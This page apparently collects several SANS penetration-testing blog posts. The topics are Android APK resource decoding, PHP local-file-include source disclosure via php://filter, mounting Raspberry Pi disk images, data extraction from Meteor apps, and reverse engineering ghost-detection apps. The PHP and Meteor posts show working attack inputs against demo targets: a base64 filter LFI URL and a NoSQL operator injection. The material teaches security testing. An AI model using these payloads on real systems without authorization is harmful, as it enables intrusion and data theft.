Mining Android Secrets (Decoding Android App Resources)

8178999673_9f8c939b37_o

By Jeff McJunkin

As a pen tester and avid Android user, I’m keenly interested in the security of Android applications. Even without looking at the code, we can gain a tremendous understanding of what happens in the deep, dark corners of an application. All we need to do is dig away at the Android resources.

Evaluating Android applications is more than just looking at the decompiled source or runtime analysis of packet capture data. When I’m examining applications, for example, the stuff other than code (“resources” in Android terms) can help me figure out the purpose of the application itself. Josh Wright found the same thing to be true when he examined a number of “ghost detection” Android apps over the summer.

As a general rule, if the app includes 10,000 MP3 files of creepy sounds, it probably isn’t “tapping into the non-corporeal aether.”

Background

While we commonly think of resources as files, they can just as well be strings or any arbitrary data. For internationalization (commonly abbreviated “i18n”) application developers will commonly include the strings of an application in many forms, so that they don’t hard-code English text, for example. Similarly, it’s convenient to extract some constants such as URL’s, local HTML, and images from being included in the code itself and put it into a resource, instead.

Unzipping an APK

All that resource information is bundled together in a binary file named resources.arsc and stored in the final .APK file. Since an APK file is just a .zip file that has been renamed, you can use the unzip utility to open it up and take a look:

jeff@blue:~/example$ unzip mobile-release.apk 
Archive:  mobile-release.apk
  inflating: AndroidManifest.xml     
  inflating: META-INF/CERT.RSA       
  inflating: META-INF/CERT.SF        
  inflating: META-INF/MANIFEST.MF    
  inflating: build-data.properties   
  inflating: classes.dex             
  inflating: jsr305_annotations/Jsr305_annotations.gwt.xml  
  inflating: res/anim-v21/design_bottom_sheet_slide_in.xml  
[...skipping a lot of output...]
  inflating: res/transition-v21/lb_vertical_grid_return_transition.xml  
  inflating: res/xml/allowed_media_browser_callers.xml  
  inflating: res/xml/automotive_app_desc.xml  
 **extracting: resources.arsc**          
jeff@blue:~/example$ 

Here I extracted an APK file that I built from Google’s open source project.

Unfortunately, I wouldn’t recommend looking around in these folders manually as a regular activity (feel free to do so for the first few applications you extract, though).

Why? Because production applications have a lot of files.

Really. A lot of files:

$ unzip mobile-release.apk >/dev/null
$ find . -type f | wc -l
1392

In other words, it’s easy to get lost exploring these dark passageways, and even more difficult to thoroughly inspect all of the data manually.

Since today’s topic is resource files, let’s take a look at those in particular. I’ll take a great idea from our DFER friends and look for the least-frequently occurring file types with some Bash command line kung-fu below:

$ cd res
$ find . -type f -exec file -b {} \; | cut -d, -f1 | sort | uniq -c | sort -n
      4  Ogg data
    380  Android binary XML
    999  PNG image data

In this command, find identifies files (not directories and such, that’s what -type f is for) and runs file -b on each filename, in case of mislabeled file extensions. The first cut command takes just the output from file -b before a comma, since file gives information about image resolution and such. The sort command sorts the output from the previous command, which is necessary for uniq -c, which counts the sorted input. Finally, I used sort -n to show the output in numerically-sorted form, so we see the least frequently occurring file types first.

The “Android binary XML” output that the file command returned tells us that those XML files aren’t actually plain text. They are a binary representation that is a lot more hassle to deal with. Fortunately, we don’t have to go file system spelunking manually; we can rely on other tools to help with the analysis.

Decoding an APK

First up is Apktool, a command-line utility that works very reliably to decode Android application data. If other, perhaps more automated tools are failing you, I’d highly recommend going back to Apktool for your Android application analysis needs.

Here is the basic usage of Apktool against an APK file:

jeff@blue:~/example$ ls *.apk
mobile-release.apk
jeff@blue:~/example$ apktool d mobile-release.apk 
I: Using Apktool 2.2.1 on mobile-release.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/jeff/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

We can see that Apktool loaded and decoded the resource files (including that “binary XML” we saw before) and wrote them to the filesystem. Let’s verify that using the same find usage as before:

jeff@blue:~/example$ cd mobile-release/res/
jeff@blue:~/example/mobile-release/res$ find . -type f -exec file -b {} \; | cut -d, -f1 | sort | uniq -c | sort -n
      4 Ogg data
    544 XML 1.0 document
    999 PNG image data

Sweet! Not only did we get more files, the XML files are now in plain text. What treasures shall we find inside? Well, for quick analysis of the application, I like to search in the decoded strings.xml file as follows:

jeff@blue:~/example$ cd mobile-release/res/values
jeff@blue:~/example/mobile-release/res/values$ less strings.xml 

Of course, if you’re looking for back-end web services, you could also try to find URLs inside some of those XML files.

What else do we have to work with? If you’re looking for a GUI and you’re willing to accept a little less reliability, there are two tools I commonly reach for that I’d like to recommend.

First up: JadX. I like JadX for a more thorough examination of the code inside the application itself, as it gives you an IDE-like viewer of the decompiled code, like in the following image:

Another tool I like is called APK Studio. If I ever plan to edit the source code to an Android application, I like to use APK Studio, because it makes re-zipping the resources, signing it with a certificate (that you unfortunately have to create outside of APK Studio), and installing it onto your Android device very easy. Here’s a screenshot of the application itself:

Whew! That was a lot of content for one blog article, but I hope it helps you get a good start to examining Android applications.

Next time you’re evaluating an Android app, make sure you investigate the app resources. You never know what unexpected and exciting speleothem you may find.

Happy hacking!

– Jeff McJunkin

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Getting MOAR Value out of PHP Local File Include Vulnerabilities

By Jeff McJunkin

mo71xB0

Wouldn’t web application penetration testing be easier if you could look at the source code? Well, when looking to expand my web app pen testing skills, my good friend and co-worker, Josh Wright, mentioned a specific new twist for Local File Include vulnerabilities on PHP-based web servers: PHP wrappers.

PHP wrappers allow us to make Local File Includes far more useful. The PHP interpreter can handle many things as streams of data, such as local files, remote URL’s, and even remote SSH systems! What’s most interesting today, though, is accessing “various I/O streams” through the php:// wrapper. With php://, we can read the Standard Input, Standard Output, and Standard Error of the PHP interpreter itself. For example, with php://stdin, we can read the raw input a user sends, which can be useful if the PHP interpreter adds some formatting and such that can get in our way. This often comes up with JSON being sent to a PHP interpreter, for example.

The most interesting wrapper, though, is the most meta of them all — the php://filter wrapper, which allows us to apply one or more file transforms to a file input or output. What kinds of filters, you ask? All sorts of kinds, I reply!

$ php -a
Interactive mode enabled

php > $streamlist = stream_get_filters();
php > print_r($streamlist);
Array
(
[0] => zlib.*
[1] => string.rot13
[2] => string.toupper
[3] => string.tolower
[4] => string.strip_tags
[5] => convert.*
[6] => consumed
[7] => dechunk
[8] => convert.iconv.*
)

Honestly, I’m not sure why I’d need to do ROT13 on a stream of text as part of a real application, but it’s not nearly as interesting as the filters underneath item #4, convert — specifically convert.base64-encode. How do we make it work? The syntax is a bit odd, but luckily a pre-canned line will do for 99% of cases:

$ echo "Something secret" > secret.txt
$ php -a
php > include("php://filter/base64-encode/resource=secret.txt");
Something secret

73710814

Good point, Philosoraptor! In this example, I could’ve just as well done this:

php > include("secret.txt");
Something secretSomething secret

So why use php://filter at all? Well, oftentimes a file extension is added on the server-side code as follows:

<?php
include($_GET["page"] . ".php");
?>

And imagine I have another page, index.php, that looks like this:

<?php
print("Some index page or something\n");
?>

You’ve probably seen URL’s like the following: http://localhost/ex1.php?page=index. That URL will load index.php (the “.php” is added server-side, remember) and include it in the HTTP response as follows:

$ curl "http://localhost/ex1.php?page=index"
Some index page or something

However, we can’t see the source to either ex1.php or index.php, because the PHP interpreter will be interpreting that code, not merely displaying it. With the magic of the base64-encode PHP filter, though, the PHP interpreter will not interpret the resource as code. This allows us to see the original server-side PHP code content! Let’s give it a shot:

$ curl -s "http://localhost/ex1.php?page=php://filter/convert.base64-encode/resource=index"
PD9waHAKcHJpbnQoIlNvbWUgaW5kZXggcGFnZSBvciBzb21ldGhpbmdcbiIpOwo/Pgo=
$ curl -s "http://localhost/ex1.php?page=php://filter/convert.base64-encode/resource=index" | base64 -d
<?php
print("Some index page or something\n");
?>

Great! The “.php” extension is still added on the server side, but we’ve managed to get something very useful anyway. Now we can examine the PHP for SQL injection, code injection, secrets like database connection information, etc.
1fgmcx

Have fun hacking all the things!

–Jeff McJunkin

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Mount a Raspberry Pi File System Image

By Josh Wright

Yesterday, I started my yearly Epic Desk Cleanout. This annual ritual is more about holding up a trash can and sweeping everything into it. I really clean, which includes cataloging all the random SD cards I’ve collected throughout the year.

"SD cards" by Seeweb is licensed under CC BY-SA 2.0

For SD cards, I’ll typically dd the contents of the drive to a Linux box, then examine the data from a shell. This year, a lot of those SD cards are Raspberry Pi images. I end up with a file system dump that I need to examine:

screenshot0

Fortunately, the fdisk utility on Linux can read from a physical device, or from a data dump file:

screenshot1

Here, fdisk reveals a few important tidbits about the binary image:

  • The sector size (512 bytes)
  • The partitions in the disk image including file system types
  • The starting offset in sectors for the file systems

Using the sector size (512 bytes) and the start sector for the Linux file system (264192), we can use a little shell-fu to calculate the number of bytes to the beginning of the file system:

screenshot2

The Linux filesystem is 135,266,304 bytes into the pi.img file. Next, we create a mount point (I use mnt from my current directory, but you can use any unused directory) and mount the image, specifying the number of offset bytes to the Linux partition:

screenshot3

Now it’s just a matter of changing to the mnt directory, and exploring the data.

1 SD drive down…1,978 to go.

-Josh

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Mining Meteor

By Tim Medin
SANS Instructor & Counter Hack Engineer

Meteor is a game-changing framework for rapid software development and is the top-rated web framework on Github. Meteor offers a number of benefits including offering real-time applications by default. With its great benefits, we are likely to see more Meteor applications…

…And you should know how to hack it!

Meteor Basics

TL;DR: The client pulls data with a subscription from a corresponding publication. All rendering takes place on the client. The client has all the code for the site to render the data.

Sometimes too much data (or code) is sent to the client even though it isn’t displayed. If the client pushes too much data, either documents (rows in a traditional RDMS) or fields, we can exploit that. The data doesn’t have to be rendered to extract it from the server. The data is sent to and from the server using a protocol called the Distributed Data Protocol (DDP). DDP handles both data synchronization as well as remote procedure calls. We get nicely typed data in our minimongo database in the browser. We can extract the data using the methods described below.

Extracting the Data

We can extract the local collections (collections are analogous to traditional RDMS tables) using the following JavaScript console command:

Meteor.connection._mongo_livedata_collections

To extract the data from the collections we can use:

MyCollectionName.find().fetch()

Or list the subscriptions:

Meteor.connection._subscriptions

Automation with Tampermonkey & Meteor Miner

We can extract the data manually or by running scripts in the context of the page. To automate the process, we need to be able to access the JavaScript variables, but unfortunately Firefox and Chrome WebExtensions don’t allow access to JavaScript variables. IMHO, this is a silly separation. Extensions can already manipulate the entire DOM. I don’t understand why this provides any signification security difference…but I digress.

Fortunately, the Tampermokey script allows access to JavaScript variables. I wrote a Tampermonkey script to extract information from Meteor sites and posted it on my github page.  I call the project “Meteor Minor.”

This script grabs information from the site, including the names of templates (analogous to pages), the template helpers (functions in the a template), subscriptions, and collections.

Routes

MeteorMiner can be used to find paths that are used with Iron Router. As a pen tester, we access these pages and see if authentication is properly implemented and that the associated pub/sub is properly filtered. In the MeteorTodosGoat application, the /admin/users route exists even though there is no link to it in the interface.

PastedGraphic-6Collections

MeteorMiner analyzes the collections and looks for unique field sets. If the data has a non-uniform shape it is noted next to the collection. This can be helpful to find unique data that may have leaked. To see the field types in MeteorMiner simply click on the collection name in Meteor Miner.

PastedGraphic-7

You can use MyCollectionName.find().fetch() to access the all data in the collection and look for any sensitive information. In the MeteorTodosGoat application the password hash in “accidentally” pushed to the client since the developer didn’t 1) restrict access to the data even though the page is not accessible and 2) didn’t filter the sensitive fields from publications.

PastedGraphic-9

Subscriptions

Active subscriptions and the parameters passed to the subscriptions are listed in Meteor Miner.

PastedGraphic-8

The publication and parameters can be fuzzed to see if there is a way to extract extra data from the web server. For example, in the JavaScript console we could try the following:

Meteor.subscribe('list', {$gt: ''})

In MeteorTodosGoat it will extract all the Todo Lists from the database.

Tools

Conclusions

While Meteor and NoSQL do offer a lot of protections against some of the common attacks (traditional SQL injection and XSS), there are still ways we can attack these systems. In some ways, it can be even easier to attack modern apps as so much processing is done on the client.

I do believe that pen testing Meteor-based applications is growing increasingly important, and I hope you have fun conducting such projects in the near future.

    – Tim Medin

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Ghost in the Droid: Reverse Engineering Android Apps

By Joshua Wright

For the past few years I’ve been invited to speak at the SANS HackFest conference. This is a great opportunity for me to present new research and useful pen testing techniques to a hungry audience.

It’s also a highly competitive event among speakers. Each year my stuff needs to be bigger and better than the year before.

Ghost Box app for Android

Over the summer, my daughter and I watched a show about a haunted house, and the reenactor used an Android app to communicate with ghosts. I saw two excellent opportunities:

  • An opportunity to answer the timeless question: can Android apps detect ghosts?
  • An opportunity to get better at Android application reverse engineering.

The Plan

My budget-manager-for-crazy-projects and I agreed that I would spend $200 on Android apps that claim to detect ghosts. I excluded anything that was free, marked as entertainment, or otherwise admitted that they did not actually detect real ghosts. Instead I focused on apps that were labeled professional use, that claim to meet or exceed the capabilities of commercial ghost detection tools, and claim to perform genuine ghost detection.

The apps I chose ranged from $0.99 to $29.99 in price, and are generally categorized as including one or more of 4 ghost detection capabilities:

  • Electromagnetic Frequency Measurement (EMF) tools
  • Electronic Voice Phenomenon (EVP) measurement (ghost audio)
  • Ghost radar and visual identification apps
  • Ghost communication tools

Ghost Detection Apps
I evaluated 20 Android ghost detection apps in total, and at HackFest I revealed my analysis results for 5 apps:

  • Ghost Hunter
  • Joe’s Ghost Box
  • Ghost Speaker
  • P-SB7 Ghost Box
  • My Own Ouija Board

Spoiler alert: None of the Android apps could be confirmed as actually capable of identifying ghosts. Sorry to disappoint!

The Tools

My work primarily consisted of dynamic analysis (install the app, capture network traffic, monitor the filesystem, and look at logging messages) followed by static analysis (unzip the Android APK file, examine the embedded resources, decompile and analyze the source code). Somewhat unsurprisingly, I found my usual cache of tried-and-true tools served me well:

  • Android Emulator, Genymotion or Android-x86 to virtualize Android devices (making analysis a bit easier than using a physical Android device)
  • Wireshark for packet capture analysis
  • Burp Suite for proxy interception
  • JadX for static application reverse engineering
  • Android Studio to import, annotate, and refactor decompiled sources
  • Apktool to extract Android resources and decompile low-level Android bytecode
  • 7-zip or any other unzip tool to extract resources from an Android APK file

In particular, I started using Genymotion as my go-to emulator for runtime analysis of Android applications. Genymotion uses VirtualBox as the behind-the-scenes hypervisor to emulate Android devices, but it does so with a very simple user interface. Free for personal use, it’s quick and easy to download and install Genymotion on Windows, Mac OS X, Linux.

After starting Genymotion, you’ll have the option to create new Android virtual devices, choosing from different Android versions and hardware configurations. From there, it’s easy to start the Android device, scale the window, and install or copy files to the virtual device with drag-and-drop.

Screen Shot 2016-12-03 at 4.47.25 PM

Although Genymotion lacks the “-tcpdump” and “-http-proxy” features that come with the official Android Emulator and the Qemu hypervisor, it’s easy enough to capture Genymotion network traffic from your guest using Wireshark. HTTP proxy settings can be configured using the Genymotion virtual WiFi interface, or though the Genymotion settings before starting the virtual device.

Screen Shot 2016-12-03 at 4.52.49 PM

The Results

The apps were pretty lame.

Screen Shot 2016-12-03 at 11.36.23 AM

Several of the apps used a random number generator to “detect” ghosts at various intervals, using static images to populate “radar” systems, or to serve up “ghostly” audio clips. Other apps used static wordlists to spook the user into thinking they could communicate with the dead, or otherwise hooked into cloud-based bot communication systems. One app overlaid a picture of a Ouija board with chat directly from cleverbot.com, changing each response of “bot” to “spirit”, “ghost”, “psyche”, or “soul”.

Screen Shot 2016-12-03 at 11.40.34 AM

“Stay classy, ghost box app developers.” -me

Conclusion

My budget-manager-for-crazy-projects asked me if the $200 and hundreds of hours spent analyzing Android ghost box apps was worth it.

Yes! Analyzing crappy ghost box apps was well worth the time and money investment.

Going into this, I hoped I would find evidence of ghost detection capabilities that would defy scientific understanding. Instead, I found developers using the compass as an RNG to graph “energy values that paranormal entities might be projecting”. While that was mildly disappointing, I am well-pleased with this project.

I’m a better Android app reverse engineering analyst now than when I started.

Looking at all these apps forced me to improve my understanding of how the Android SDK works. I found bugs in some of my favorite tools, and figured out how to overcome them. I was able to optimize my workflow, to analyze an app in less time, and to produce better results. I was able to leverage Android Studio as a mechanism to aid my reverse engineering efforts, building a better understanding of how these apps work.

Going into this project, I was motivated to find out what I could about ghost box apps, and I wanted to build my skills as a mobile application security analyst. I had clearly defined goals and a strong motivation to keep working through the challenges that inevitably creep up in any project. At the end, I hadn’t identified any ghosts, but I felt smarter and more capable to evaluate Android applications, a skill that I can apply in customer pen test engagements going forward.

You can check out my presentation from the SANS HackFest 2016 conference. While you’re there, check out the other presentations too.

In the meantime, if you come across a ghost box app that you think actually detects ghosts…then drop me a note in the comments section below.

-Josh

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02